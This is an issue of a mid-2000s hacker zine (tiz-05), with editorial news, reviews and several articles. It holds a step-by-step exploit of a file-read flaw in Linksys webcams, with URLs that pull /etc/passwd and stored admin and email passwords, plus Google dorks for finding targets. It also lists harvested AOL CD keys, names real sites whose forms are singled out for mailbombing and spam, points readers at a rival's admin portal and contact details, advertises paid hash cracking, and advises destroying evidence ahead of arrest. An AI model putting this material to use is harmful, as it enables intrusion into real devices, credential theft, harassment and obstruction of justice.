You are on page 1of 26

&&&&&&&&&&& &&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&

&&&&&&&&&&& &&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&


&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&& &&&&&
&&& &&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&
&&& &&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&
issue 05- we finally got the right year
"because those other zines aren't underground enough"

#########################################
# [t]-[i]-[z]_[i]-[s]_[b]-[a]-[c]-[k] #
#########################################

many of our readers thought tiz was dead. well guess what, we're fucking back!
after some elaborate obstacles, we are finally back in business and ready to rock
the underground. we said what we wanted, did what we wanted, and we intend to
continue in that direction. there are lots of people who would like to see tiz
bite the dust, but they are rich, chauvinistic, censoring, conglomerates. at tiz,
we believe all censorship is bad. some people argue that some things need to be
censored, but they are fooling themselves. if we censor information that we think
is "bad for society" we are giving ourselves permission to censor anything. people
aren't allowed to leak cia officers because it is "bad for society". people aren't
allowed to protest at the presidential events except in the "first amendment zone"
because it's "bad for society". people aren't allowed to contradict the government
unless they want a conspiracy charge because opposing the government is "bad for
society". people aren't encouraged to talk about hacking because it's "bad for
society". if we want to exist as a democratic self-governed society (which we
believe the internet should be) we need to stand up for our rights and abolish all
censorship. unless the government has something to hide (like tyrannical killings,
corruption, etc.), then people should be able to say whatever they want. the
problem is, governments do have things to hide and our governments are abusing
their power. without censorship and anonymity, it makes it very hard for them to
become corrupt. recently, tiz has been censored quite a few times in various ways.
we are back to say that we won't respond to the empty threats of governments or
the powers that be. if we have to rot in a jail cell for eternity because we were
defending our rights, then we will have to. we refuse to be censored and we are
not afraid to drop the docs or blow the whistle. so corrupt organizations: watch
out! because tiz is back and ready to take you down!

1. about the antidote/tiz relationship


while the antidote is making positive change, it's making it very hard for us to
operate. as a result, we have broken all ties to the antidote and will no longer
be providing specific reports about them. they are starting their own zine and
website so they are still active and alive. we are not censoring them, just
politely asking them to do their actions elsewhere. this agreement was mutual
between the groups and both groups agreed it was safer to split. we are still
on good terms with the members of the antidote, but we will no longer be
affiliated with them in the zine.
2. why were we gone for so long?
well, there's a lot to explain here. first off, the staff got really jammed up
with all the work required to publish tiz-05. our site (tiz.brokenfloppy.com)
went under a 3-day ddos attack thanks to our buddies at the carding site
mazafaka.info. this was because of our affiliation with the antidote and their
actions to take down mazafaka.info. we have left brokenfloppy.com and have moved
on to our new and totally awesome host progenic.com. progenic.com has long been a
part of the underground community and we are very grateful to have hosting
from such an amazing site. you can visit the new site at
http://tiz.progenic.com. a short message on brokenfloppy.com was left after we
broke off:
"on a less happier note, i would like to announce mine, cypress, withdrawal from
the zine t.i.z. i will also not be providing hosting for them, or for any of
their projects, or any other projects which could cause me, or brokenfloppy
trouble.
++cypress "

we have lost many members since the last issue due to inactivity and other
circumstances. the members we have lost are zraith, a3kton, smile, and billy
hoyle.

current members:
sheepbyte [sheepbyte@gmail.com]
lexdyisc [yaj.yake@gmail.com]
easyex [easyex@gmail.com]

we have slots for four more members. send us a email with a quick link to any work
you have done with a short summary (1 or 2 paragraphs) about what your skills are,
what you are interested in, etc. members are expected to write an article every
issue or two or three.

3. the tiz announcement list


we are starting a tiz mailing list. people who subscribe will get notified
when new tiz releases come out and any other important information regarding
tiz. send an email to us with [subscribe] in the subject.

4. our new email address


finally, we are getting an email address that's not at gmail.com! send email
to tiz@progenic.com

5. thanks to all our supporters


we would like to send a huge thank-you to our fans and everybody who sent us
letters asking where the hell we were. this zine wouldn't exist without you
guys!

6. how to contact us
please use the new tiz@progenic.com email for all messages to the zine. if
the messages are for specific members, please use their personal emails provided.
this email can be used to send questions, comments, rants, articles, reviews,
links, and pretty much everything else.

7. send articles
this issue was small because we didn't have many articles sent in. please
send articles to tiz@progenic.com. we will publish pretty much anything so give it
a shot.

8. word wrap?
we will no longer be word-wrapping the articles for you. if you are on a computer
that doesn't have word wrap, and you can't find a word wrap program, then that
sucks for you. quite frankly, it takes to long to word wrap everything. if you
don't know of any programs that feature word-wrap... here are a few:
notepad (win32)
wordpad (win32)
open office (linux)
open office (win32)
microsoft word (win32)
k-mart text editor beta version .001
keep up with the changing times guys, it's not that difficult.

9. we need propoganda
we are having a propoganda contest. we are accepting buttons, banners, images,
flyers, and other creative works. the prize will be.... $5 to the best piece of
propoganda we recieve. (payable via e-gold or paypal or cookies)

10. vote for us


if you have enjoyed this zine and think other people might enjoy it, please vote
for us:
http://www.progenic.com/vote/?id=tizownzuall

#####################################################################
included in this issue: # author #
the aol keygen project # tiz #
hacking cisco linksys webcams # stderr #
reviews # tiz #
from arrest to jail # sheepbyte #
the truth about munga bunga/hackology # sheepbyte #
spread lynn-cisco project # tiz #
the dod gets owned # tiz #
links # tiz #
da h4x0r newz # tiz #
tell-a-friend vulnerabilities # sheepbyte #
tiz services # tiz #
mail.b0x # various #
#####################################################################

############################################
# the aol keygen project #
############################################
we are still looking for aol cd keys. these cds are everywhere so just take a copy
and send us in the password and number. please send us (if possible) where you got
the cd and the pass+number for your friend. we really want to crack the aol cd
password code so send us if you believe this to be a noble cause. it's only for
educational purposes, and we don't think it can really cause any damage to aol
(but damage to aol is good so it's a stupid point to make).

current keys:
7j-7193-5396
curls-guided
7h-jxfd-x469
trails-gallop
7j-6404-1115
flies-pour
3h-jxpl-p552
spins-cube
7j-6774-1063
monied-visas
0h-jx4y-g424
cool-play
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6774-1060
lyes-vernal
5h-jx6k-3017
border-anchor
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6354-6766
field-capper
2h-jxkc-h695
pink-level
7j-7854-2215
hawked-polers
0h-jx7f-v517
puzzle-venus

##########################################
# hacking cisco's linksys web cams #
# by: stderr #
##########################################

i. finding a target.
ii. the problem.
iii. accessing the admin panel.
iv. finding emails and passwords.
v. conclusions.

########################
# i. finding a target. #
########################

for this part of the tutorial, we'll utilize a simple google hack.
if you search johnny.ihackstuff.com for linksys webcams you'll find
something like this:
inurl:main.cgi

the search that i utilized was:

inurl:main.cgi?next_file=

the service may be running on any number of ports, but the most common
ports that i've seen are ports 80 and 1024.

####################
# ii. the problem. #
####################

once you've found a webcam using google, open the link in your favorite
web browser. you'll see something like this in your browser.

http://127.0.0.1:1024/main.cgi?next_file=img/main.htm

the problem that makes this hack possible is that main.cgi?next_file


accepts any file, and reads it into the browser. so, obviously you
could access /etc/passwd.

http://127.0.0.1:1024/main.cgi?next_file=/etc/passwd

but, we're going for something more interesting.

###################################
# iii. accessing the admin panel. #
###################################

there are any number of ways the web interface could be setup, but this
will only cover the default setup. hacking any derivatives from this
style should not be difficult at all. just look at the html source code
and find where the admin page urls are located.

at the top of you page you will see a panel with something like this.

home view video setup linksys web help exit

setup is the one we want. if you look at the source code you'll see that
the link to setup is...

http://127.0.0.1:1024/adm/file.cgi?next_file=basic.htm

clicking on the link prompts for the username and password of the router.
remember main.cgi? yeah, well since we can read any file on the system
we're going to load basic.htm, the setup panel, without needing a password.

http://127.0.0.1:1024/main.cgi?next_file=adm/basic.htm

wow look at that. however, if you try to access something else from the
regular administrative menu, you will be prompted for a user/pass combo.
now that we see how to load the menu, it's a trivial matter to obtain
a legitimate password.

http://127.0.0.1:1024/main.cgi?next_file=adm/pass_wd.htm
just look at the source code, around where the form is located and in plain
text there is the user/pass. in order to access anything else in the admin
menu, just open it up with main.cgi?next_file=adm/<page.htm>.

common administrative files.

http://127.0.0.1:1024/main.cgi?next_file=system.htm
http://127.0.0.1:1024/main.cgi?next_file=basic.htm
http://127.0.0.1:1024/main.cgi?next_file=image.htm
http://127.0.0.1:1024/main.cgi?next_file=pass_wd.htm
http://127.0.0.1:1024/main.cgi?next_file=users.htm
http://127.0.0.1:1024/main.cgi?next_file=status.htm
http://127.0.0.1:1024/main.cgi?next_file=advanced.htm

######################################
# iv. finding emails and passwords. #
######################################

one final interesting endeavor is to extract the password of the user's


email account. there's an option in linksys that allows it to email you
when the motion sensor is set off. the user/pass of the email account
may also be stored in plain text.

http://127.0.0.1:1024/main.cgi?next_file=adm/advanced.htm

###################
# v. conclusions. #
###################

i've only run into one webcam that successfully blocked this type of
access. the result was a 403 webserver error. so if you want to keep
your passwords safe you might want to look into file permissions and
other forms of data protection for your web camera.

#####################################################################
that's all for this article. i appreciate you reading this far.
if you have any input/criticism please email me.
stderr [dot] dev [at] gmail [dot] com.

shouts: cult, kazm, sheepbyte, and 34019.

-stderr
#####################################################################
#######################
# reviews #
#######################
1. freenet
this anonymity application is a great way to communicate and distribute
information anonymously. it's the best anonymity system that has come around and
it features advanced ways of protecting your anonymity. it works on windows/linux
and they are making a major network overhaul "before christmas". the network may
be slow at the start, but after a week or two it's up and running to a normal
speed.

2. pgpdisk
this anonymity application is great for encrypting your hard drive. if you don't
have the money for it, truecrypt is also a good alternative. pgp is the best way
to protect your information from people who shouldn't have it.

3. privoxy
this is a great proxy with filtering and forwarding abilities. users can block
specific ads/sites as well as use it in conjunction with other proxies. privoxy is
based on the internet junkbuster.

4. ankit fadia's unofficial guide to ethical hacking


this is one of the best books on hacking available. it goes in-depth and even the
most experienced hackers can learn something. the price at most stores is $50
bucks, which is a total rip-off. check it out from the library, or download it and
send the author $20 in the mail with a message reminding him why you were forced
to download the book in the first place. but honestly, the book is worth every
penny.

5. hacker's black book


don't say we didn't warn you. this book is worthless. it contains inaccuracies,
omits needed information, and really doesn't contain anything worthwhile in it.

6. astalavista.net
bleh. this site sucks. they contain a nice archive of tools (most of which are
trojaned). their dvd is actually pretty decent and we suggest you download it from
a p2p client near you and then scan the hell out of it with your preferred virus
scanner. the membership just isn't worth it and they have become very corrupt.
they used to be cool, now they aren't. their forums are pretty decent, but there
are plenty of better ones out there.

7. hackthiszine (hackthiszine.com)
this zine is put out by hackthissite.org. the zine has a lot of information and is
a very good read. it gets pretty political at some points, but that shouldn't
distract you from the good information contained inside it.

#########################
# from arrest to jail #
# by: sheepbyte #
#########################

note: this information has been compiled through extensive research and
interviews. i do not intend for this guide to be used to get guilty people out of
trouble. the government likes to pick fights with people who stand up for their
rights so this is for them.

1. pre-arrest precautions

a. protect your data


if you are a person who may be a target for an arrest, or even if you aren't, you
need to protect your information. encrypt your hard drive with something like
pgpdisk or truecrypt. use a strong encryption method to store your data. this can
slow down your computer dramatically, but it is very well worth it. make sure your
password is nothing you have ever used for anything and that it is at least 10
characters. store your private key on removable storage like a floppy disk do you
can destroy it if needed. if "they" get your private key, you can throw your hopes
of keeping your data safe away. once it is evident that arrest is near (such as
knocking at the door) destroy it immediately. the best way to destroy removable
media is to eat it. the problem is, you could die from such an action. many
removable storage devices have toxic chemicals or are not digestible (crapping out
the corner of a floppy is not fun!). if you have a fireplace then burn the sucker.
metal will probably not burn, but plastic will. simply throw the floppy in the
fire. if you don't have a fireplace, you can break it into pieces and flush it
down the toilet. be careful, if the toilet gets clogged, you are really screwed.
the removable storage needs to be in .5x.5 inch pieces at the maximum. floppy
disks are great for this because they can be sliced and the data can be destroyed
with a magnet. if you are using magnetic storage, always keep a back-up copy of it
on another magnetic storage component such as another floppy. magnetic storage can
fail and one bit wrong can make your data irrecoverable. if possible, remember the
private key (it's very long, but flash cards can accomplish anything). if you live
in a country that could use torture or drugs on you, do not do this as you will
leak it. never give a copy of your key or information about your security system
or anything to anybody. the feds will make your friends rat you out! don't even
tell people your hard drive is encrypted. with truecrypt, it's impossible to tell
if it's encrypted, so you can avoid the feds even knowing that your data is
encrypted.

b. don't store anything incriminating on your computer


the feds can use almost anything as evidence against you. for most people, i
suggest you clean out your files every two weeks. delete anything you do not
absolutely need that could incriminate you. keep any legit files you may have!
delete cookies, cache, temp files, and other worthless crap at least once every 2
days.

c. get a firewall
the feds can obtain permission to hack into your computer. get a firewall. if you
get any connections coming from any .gov/.mil./etc range, disconnect! there are
several good firewalls on the market. the best you can get for this is blackice.
the rest pretty much follow that. i suggest outpost, zone alarm, or sygate. norton
and mcafee are good firewalls if you like it simple. if you don't know why an
application is accessing the internet, or why somebody is accessing your machine,
block the traffic. feds can give you trojans and brute force your logins.
d. don't give them a trail
everybody knows this, but people don't do it much because of the hassle it causes.
always use proxies, never do anything stupid on your connections, and always
encrypt your traffic.
a. always use proxies
let's face it. you need proxies. proxies are the only way to mask your ip and
it's absolutely necessary that you use one to protect your anonymity. when you are
accessing the internet, give yourself a limit and stick by it. my limit is 4
proxies minimum and i actually use close to 15. you should never use less than 3.
proxies will not protect you from the government. the feds write subpoenas like
bill gates writes checks. this is why you have you make your true ip address
worthless to them.

b. always encrypt your connection


there's no reason not to encrypt your connection. the feds can tap your
connection and intercept all your data. you can use a program like tor or i2p or
you can use a vpn. a vpn is like a proxy, but the data between you and the vpn is
encrypted. if they can intercept your traffic, they can get a lot of evidence on
you.

c. don't do something stupid on your connection


some people do stupid stuff like hack from their home connection. they can
always trace it back to your ip. use the library connection or a public wifi
connection. there's no reason why you should do anything stupid on your
connection.

2. the interrogation
a. techniques
there are a variety of techniques that can be used for interrogation. in many
countries, they can humiliate you, drug you, intimidate you, beat you, or threaten
to kill you. in the united states if they label you a terrorist, they can do all
those things as well.

a. good cop bad cop


this technique isn't used much on hackers anymore. they realize that most
hackers and too damn smart for this old trick. one cop comes in pissed off and
gives you the beat down. he ruffs you up by asking harsh questions, shouting, and
doing other harsh activities. the second cop or the "good cop" comes in and
apologizes for the other cop's behavior. he will blame this on him having a bad
day, or whatever the hell he wants. he will tell you that he will try to be nicer
and that he's a higher-up officer so he doesn't have a lot of time to waste. this
is bullshit. they are usually of the same rank and they play these roles to make
you squeal. don't listen to it.

b. staring you down


this is used in lots of interrogations. the officer will stare at you in an
attempt to make you break eye contact. there are three ways to handle this. you
can beat him, protest his intimidating activity, or forfeit. if he is making you
anyway uncomfortable or humiliating you (say, by staring at your breasts), tell
your lawyer. also, make sure it is loud enough so that it is on the record. they
can't use evidence gathered if they are humiliating you. if your lawyer objects
and he continues, bring this up in court. there's no reason for a judge to use
evidence collected illegally.

c. the reduced sentence scam


many interrogators will tell you that if you rat out your friends or plead
guilty, you will get a reduced sentence. this is true to some extent, but it isn't
worth it. if you rat out people, you have to live with the fact that they are
rotting in a jail cell because of you in addition to the fact that you have
admitted guilt. if you say you know people who have broken the law, they will use
that against you. if they are asking you to confess, it means they are low on
evidence.

d. exploiting cocky people


they might ask you questions like "why would you hack into that system if
you couldn't do anything inside it". in this case, answer that you didn't hack
into the system so the question is irrelevant. if this questioning format
continues, ask where the questions are going. this is the simplest form of getting
your ego. don't fall for it.

e. minuscule evidence
the interrogators will come in with a weighted-down folder, mostly full of
blank paper. they will then browse through it and mention some insignificant fact,
like when you last checked your email, or how many messages you have. they work
really hard to find these facts and they are meaningless. don't let their simple
mind games fool you.

f. am i under arrest?
ask the interrogators if you are under arrest. if they say no, then politely
stand up and leave.

g. ask for your lawyer


the first thing to do is to ask for a lawyer. if ask you questions, simply
say "i will not answer any questions until i can speak to my lawyer". note: a
lawyer and my lawyer are different. if you say "a lawyer" then they will give you
a crap lawyer.

h. don't talk
the best way to respond to questions is to respond with nothing. you are not
required to say anything unless you are on grand jury. you don't have to say "i
take the fifth", or anything like that. just exercise your rights by not saying
anything.

i. there is no friendly conversation


the feds are not there to talk about your social life and drink beers and
have a good time. they'll tell you that it's a friendly conversation, even though
it is not. remember: everything you say is recorded and will be used in court.

j. ask to go to the bathroom


this is a great tool to put yourself in a position of power and think things
over. ask the interrogators to go to the bathroom. if they deny you that right,
pee in your pants soon thereafter. then they can be classified as torturing you
and the information they obtain may not be able to be used in court.

3. the arrest
a. the initial search

a. open the door!


if the police come to your house and identify themselves as law
enforcement, you must open the door. it won't do you any good to keep it locked
because they will bash it in. you could get "obstruction of justice" and
"resisting arrest" for this.
b. arrested on the street?
if they try to arrest you while you are not in your house and they don't
identify themselves as law enforcement (undercover agents), run! if they do not
identify themselves you can claim you thought you were being chased by a mugger.

c. searches
when the feds come to your house, the first thing they want to do is
search the premises. ask for a warrant. if they do not have a warrant but still
come in say you do not consent to the search. look at the warrant to see what they
are allowed to take! if they have a warrant for electronic materials and they
start taking your couch you need to protest because you don't want to lose that
couch forever. if they start searching your person, say you do not consent to the
search. the rest of the time, say nothing! they will start doing annoying things
like searching your pants pockets. they do this to annoy you and make you talk. if
you were forced to the ground or hurt in any way get in to see a physician right
away. if the doctor says your body was harmed and your arrest was without
resistance, that's power for you in the courtroom. if the feds ask questions,
simply say, "i will not answer any questions until i can speak to my lawyer".

4. in jail/with the lawyer

a. the first few hours


there are several things which can happen in the first few hours. the
thing that happens to most people is that they get scared out of their mind.
there's nothing i can really tell you except: keep cool. you won't get hurt by
other inmates as long as you keep to yourself and don't hog the phone.

b. your cell mate


it's best not to talk to your cell mate unless they start the
conversation. "what you in for?" is a great way to get knocked out. if they ask
what you're in for say "i don't know" or "my lawyer said not to talk about it".
don't tell anything to your cell mate you wouldn't want the feds to hear. they
will interrogate him to no end and make him squeal on you.

c. get bail
my best advice to anybody is to get bail. in some places, the feds can
listen in on your conversations with your lawyer. if they know everything you
know, you are definitely heading for a long time in jail. if you don't have the
money, send letters to everybody you know including family, friends, your boss,
your co-workers, your church, etc.

d. be honest with your lawyer


you need to be 100% honest with your lawyer. if you are not, it makes it
harder for them to make a good case for you. your major decision with your lawyer
is whether you choose to plead innocent or guilty. if you are pretty sure you will
be proved guilty, please innocent to save yourself a few years. the other big
decision you need to make it whether you want a trial by jury or trial by judge.
if you believe your story can touch the hearts of the jury, go for the jury. if
you are looking for a direct interpretation of the law, go for the judge.

e. appealing
at any time, you can file to appeal your case. pretty much anything can be
used as a reason for appeal. they cannot deny you the right to appeal unless you
signed it away in a plea bargain. you can send appeal request after appeal request
and never go "over your limit".

i am going to write an extension to this article which will include the content
above. the final version will require it's own text file, so keep on the lookout
for it. i hope this helps some innocent people stay out of the fed dragnet.

##############################
# the truth about #
# munga bunga and hackology #
# by: sheepbyte #
##############################

in this article i will go behind the lies of munga bunga/hackology.com.


hackology makes two programs. they make the munga bunga http brute forcer and hard
drive killer pro.

munga bunga http brute forcer:


this program claims to brute force http forms, yet it makes you a part of munga
bunga's massive botnet. the program really doesn't brute force. also, on his site
is claims that the munga bunga program ddosed the riaa and that a mail exploit
crashed the inboxes. according to the article, the attacker known as "irish rage"
is apparently famous in the underground community. strange that nobody has heard
of this guy isn't it? he says that irish rage used "multiple machines". if they
had used a botnet, they would have said it. no amount of "multiple machines" could
ddos the riaa, unless they were a botnet. he says a news site said that mbhttpbf
was used in the attacks. he claims the page expired so he kept a backup copy.
well, the pages on that site don't expire and the article never existed! it seems
pretty obvious to me that this guy is a complete sham as well as his software.

hard drive killer pro:


the other program that hackology.com makes is called hard drive killer pro. on the
main page for the software, it says "news: ammendments by mobman (sub7's author)
added to our sub7 and hdkp statement.". the sub7 writer doesn't take credit for
any work involving this software. "according to some sources, and what we have
found out, hdkp 4 is embedded into the recent versions of sub7. ". simply
bullshit. sub7 code has nothing similar to hdkp. hdkp claims to "securely wipe a
hard drive in seconds". that is also bullshit. a hard drive can only be wiped
securely (irrecoverably) by software if it is given over 35 passes of random data.
it takes days and days to do that on any average hard drive. "after rebooting, all
hard drives attached to the system would be formatted (in an unrecoverable
manner) within only 1 to 2 seconds, irregardless of the size of the hard drive. ".
how is that even possible? it's an absolute scam. so it wipes a hard drive
securely and then boots from it? nice try mb, we see right through you.

the cyberthrill scam... scam:


munga bunga takes credit on their site for shutting down cyberthrill.com, an
apparent gambling scam. they link to several articles, all of which never existed.
any quick google search will see that hackology.com did absolutely nothing except
make empty threats. just like all their promises: empty.

the whois information:


domain name: hackology.com
registrar: intercosmos media group, inc. d/b/a directnic.com
whois server: whois.directnic.com
referral url: http://www.directnic.com
name server: ns2.rybon.net
name server: ns1.rybon.net
status: registrar-lock
updated date: 01-apr-2005
creation date: 21-feb-1999
expiration date: 21-feb-2006

registrant:
the mcconnel network
150 lonsdale st.
melbourne, vic 3000
au
61 3 9852 9552

domain name: hackology.com

administrative contact:
mcconnel, network preilly@freeiteducation.com
150 lonsdale st.
melbourne, vic 3000
au
61 3 9852 9552

technical contact:
mcconnel, network preilly@freeiteducation.com
150 lonsdale st.
melbourne, vic 3000
au
61 3 9852 9552

record last updated 04-01-2005 10:43:58 am


record expires on 02-21-2006
record created on 02-02-2001

domain servers in listed order:


ns1.rybon.net 70.84.158.221
ns2.rybon.net 70.84.158.222

if you will look at the registrant, there are several suspicious things. it is
registred to the mcconnel network (not munga bunga). they give a actual address
and an actual phone number! the really strange thing is that the network contact
is at freeiteducation.com which hackology put a whole article about on their site.
could freeiteducation have bought them out? all the members left after the plug on
the site. there's a lot to be learned here.

as you continue to look at the hackology.com site, you will see that it is a total
scam. remember, you need to always think for yourself and question the information
that is given to you. if you blindly follow then you are a sheep, and sheep get
slaughtered.

if you wish to tell munga bunga what an asshole he is, use this contact
information:
mbx@hackology.com
phone: 61 3 9852 9552
mcconnel, network preilly@freeiteducation.com
150 lonsdale st.
melbourne, vic 3000

preilly@freeiteducation.com

if you want to send an abuse letter to their web host, send it to


abuse@theplanet.com
shouts to: everybody

if you want to screw with their link exchange, the admin portal is located at:
hackology.com/cgi-bin/ilp/admin.cgi

##################################
# spread cisco-lynn project #
##################################

thanks to everybody who has submitted their links so far for the mirrors of the
cisco-lynn pdf. if you have a link, please submit it to us. this is an attempt to
bypass censorship and we need your help. we will be publishing the full directory
in tiz-06!

current mirrors:
http://www.jwdt.com/~paysan/lynn-cisco.pdf
http://www.warbard.ca/temp/lynn-cisco.pdf
http://www.viruswatch.nl/info/lynn-cisco.pdf
http://www.security.nnov.ru/files/lynn-cisco.pdf
http://www.sendmefile.com/00164327
http://www9.rapidupload.com/d.php?file=dl&filepath=4604
http://www.mooload.com/file.php?file=files/1133594980/lynn-cisco.pdf
http://www.rapidsharing.com/e2ff6ec3acb6a9b2138f2fe4335d6e15
http://rapidshare.de/files/3560716/lynn-cisco.pdf.html
http://www.freefileupload.net/file.php?file=files/1133595146/lynn-cisco.pdf
http://z23.zupload.com/download.php?file=getfile&filepath=15603
http://www.mytempdir.com/295918

#####################################
# the dod gets owned #
#####################################
a reader of our zine spamslayer (creator of the spam vampire!) decided to place an
order in the dod order form we mentioned in tiz-03. please contribute to his legal
defense fund when he gets arrested.

the dod order form is located here:


http://iase.disa.mil/ars/cgi-bin/arweb?form=useschema&s=mattche&s=eta:product-
rqst&act=submit

the site does not specify that a private citizen cannot order materials!

here is the email confirmation he received:


to: elided
subject: your eta product order 034221 has been received.

dear elided,
thank you for ordering ia training and awareness products. your request
number
is 034221.
below is a description of your order.

other (specify): : other


other : other
first name : elided
middle name :
last name : elided
title : mr.
postal type : standard mail
mailing address within usa? : yes
address : elided
city : elided
state : elided
zip+4 : elided
phone number : elided
e-mail : elided
address verified : yes
www : world wide web
cd-unix security ver 2.0 : 1
cd-informationsecshort : 1
cd-daa ver 3.0 : 1
cd-cyber law i ver 1.0 : 1
cd-windows 2000 sec ver 1.0 : 1
cd-firewall&routerfund ver 1.0 : 1
cd-ssaa prep guide ver 1.0 : 1
cd-ia policy and technology : 1
cd-web security ver 1.3 : 1
cd-database security ver 1.1 : 1
cd-active defense ver 1.0 : 1
cd-dod certifier fund : 1
cd-computernetdefense ver 1.0 : 1
cd-saipr unix ver 2.0 : 1
cd-ia indefenseindepth ver 1.0 : 1
cd-io fundamentals ver 1.0 : 1
cd-sabi ver 1.0 : 1
cd-infosec awareness ver 2.0 : 1
cd-cirt management ver 1.0 : 1
cd-cyberprotect ver 1.1 : 1
cd-publickeyinfra ver 1.1 : 1
cd-introductionditscap ver 1.2 : 1
dvd-iacompseries : 1
customer comments : testing insecure web form... i sure hope
you
guys don't ship. secure your order form!

your request has been processed and was shipped on 10/25/05 00:00:00

special comments:

you should be receiving your products in the next 2-3 weeks. thank you for
ordering products from disa's education, training and awareness branch.

=================

whois -h whois.completewhois.com 209.22.99.17 ...


[ipv4 whois information for 209.22.99.17 ]
[whois.arin.net]

orgname: dod network information center


orgid: dnic
address: 3990 e. broad street
city: columbus
stateprov: oh
postalcode: 43218
country: us
"they actually shipped the stuff... i can't believe it. even after i
specifically told them not to, that i was just testing their insecure
form..."

well, there you have it. a true example of security through obscurity. i think we
can officially label the department of defense as owned!

they *may* have read his comments or this zine, because the form is now no longer
available. they probably moved it to a new security through obscurity location.

######################
# links #
######################

video.google.com
for those of you who live under rocks, check out google video. chances are, you
have already seen this site but it has awesome videos which you can search through
and watch. we highly suggest you see this site at least once.

albinoblacksheep.com
a neat little site with some games and videos and funny stuff. good for bored
people.

hackergames.net
a listing of hacker games (wargames) which is very comprehensive.

rootthisbox.org
a wargame where teams compete for points by hacking a box. a very neat competition
in our opinion.

zone-h.org
the internet attack archive. if a defacement ever happened, it will be here.
pillage.com
a new meta-search engine built by hackers! this site is one-of-a-kind and you
should all check it out.

http://128.227.92.7/
a video conference machine. there's plenty more like it so keep on the lookout.
they put a password on this one now, but it's still fun to look at.

irc://irc.oftc.net|#phreadom
an awesome chan about hacking. lots of experienced people. join up!

bbs.progenic.com
progenic has launched a new forum that has a lot of potential. there are some
really smart people at the forums you have to meet.

thepiratebay.org
this is your one-stop website for torrents. they have everything and were listed
as one of the big p2p winners of 2005 in the zeropaid article.

kisp.org
knowledge is power (dot org). kisp has a box set up for wargames and an awesome
forum where you can discuss all aspects of hacking.

no-scam.com
a great forum for people looking to make money in autosurfs, hyips, mlm sites, and
other programs.

hillscapital.com/antispam
home of the spam vampire. you can leech from his spammers, or modify the code to
leech from your own. it's no-cache, bandwidth sucking, image reloading fun.

googlefight.com
it's the ultimate showdown of coolness on googlefight.com. find out which search
query has the most results.

googlism.com
wonder what something means, or what people think about you? let the all-knowing
google tell you!

send us a link to your website, or a cool website people should hear about:
tiz@progenic.com
#################################
# d4 h4x0r n3wz #
#################################

1. happy new year


yaaar! for those who live under a rock, it's almost 2006!

2. fall 2600 released


another story for those who live under rocks

3. diebold opposed in california


the notoriously insecure diebold electronic voting machines are undergoing a
review in ca currently.

4. north carolina sued by the eff for allowing diebold voting machines
as always, the pr guy at diebold is very busy.

5. sony gets burned for drm rootkit software


after installing rootkits on millions of computers through their drmed cds, sony
got burned. lawsuits, news reports, protests, you name it. just another reason why
you should stay away from copy protection.

6. hackwire down?
hackwire.com the hacker news source was down for almost a week. not really news,
but we have to put something in slot # 6.

7. tiz ddosed
yeah, read the first few paragraphs of this issue.

8. tiz mailbombed again


some stupid n00b trying to be an uber-h4x0r

9. alexa spyware conglomerate opens database


alexa opens database of users to programmers willing to pay some $$$

10. intgold shut down


the online currency intgold was raided by the feds earlier this week. sucks for
them!

11. wikipedia makes big changes


wikipedia has started to make protected articles and permissions based on member-
groups. so long for the open encyclopedia everyone can edit.

###################################
# tell-a-friend insecurities #
# by: sheepbyte@t-i-z #
###################################

i'm sure you've seen hundreds of places that let you tell a friend about their
service through some sort of web form. hell, you may even have one on your site.
the problem is, these forms can leave you vulnerable to attacks. now, i could
write on and on using fancy words about how vulnerable you could be and give
technical names to all these items. i could go on for pages like a *real* security
professional, but i'm going to take a "no bullshit" approach. for people who don't
know what that means, it means i'm going to give you the facts and let you
elaborate for yourself.

1. mailbombing
most tell a friend forms are open to mailbombing. people can send hundreds of
messages using them. if you don't have their ip address, you may be held
accountable for their actions.

2. bandwidth
it's easy to suck bandwidth from a site using these forms, especially if you can
download remote attachments.

3. spam
somebody could use your form for spam, and the last place you want your website to
be in is spamhaus.

there are tons of other ways people can abuse web forms.
if you live in a cave and have never seen one, or want to try these techniques on
yourself, go to these wonderful websites:

http://www.americasamberalert.org/send.bok?$email.targeturl=http%3a%2f%2fwww.ameri
casamberalert.org%2fstorefront.bok
http://www.xe.com/refer/?ucc
http://www.eharmony.com/singles/servlet/referfriend
http://www.petlinkexchange.com/petcast.cgi
http://www.allaboutjazz.com/tellafriend.htm
http://www.ibdjohn.com/sendurl/
http://www.salaryexpert.com/index.cfm?fuseaction=home.tellafriend
http://www.starteasy.com/cgi-bin/send2friend.cgi
http://www.cfed.org/tellafriend.m
http://www.cgibiz.com/demo/tell/
http://www.traveldailynews.com/com_friend.asp
http://www.investopedia.com/investopedia/tellafriend.asp
http://www.ecologyfund.com/registry/ecology/involve_tellafriend.html
http://www.care2.com/members/tellafriend/
http://www.peer.org/tell_a_friend/index.php
http://www.kintera.org/siteapps/email/spreadword.aspx?c=ktisk0oug&b=196851
http://www.multipoker.com/en/tell_a_friend/tell_a_friend.php
http://www.event-solutions.info/pages/friend.asp
http://www.supertaf.com/taf.php?form=5406
http://www.creativehomemaking.com/friend.shtml
http://www.searchmalta.com/cgi-local/friends
http://www.freecolorprinters.com/fcp_refer.cfm?wt.svl=1
http://www.oxfamunwrapped.com/tellafriend.aspx
http://www.aspca.org/site/tellafriend
http://www.bargainpda.com/contact/
#~~~~~~~~~~~~~~~~~~~~~~~~~~#
| tiz services |
#~~~~~~~~~~~~~~~~~~~~~~~~~~#
tiz is now offering several services you might need. please read below to find out
about them.

_________________________________________________
#daily proxies (socks 4/5/4a) in your inbox #
#hash cracking #
#rainbow table generation #
#registry backup analysis #
#network dump analysis #
#file cracking #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hash prices:
-$15 for any hash up to 10 characters ($1 for each additional character)
-or
-$1 for each character

hashes we crack/passwords we decode:


-sip
-mysql
-mssql
-radius shared-key
-ike-psk
-kerb5 pre-auth
-ripemd-160
-sha-2
-sha-1
-md5
-md4
-md2
-vnc-3des
-vrrp-hmac
-ripv2-md5
-ospf-md5
-cram-md5
-apop-md5
-cisco ios-md5
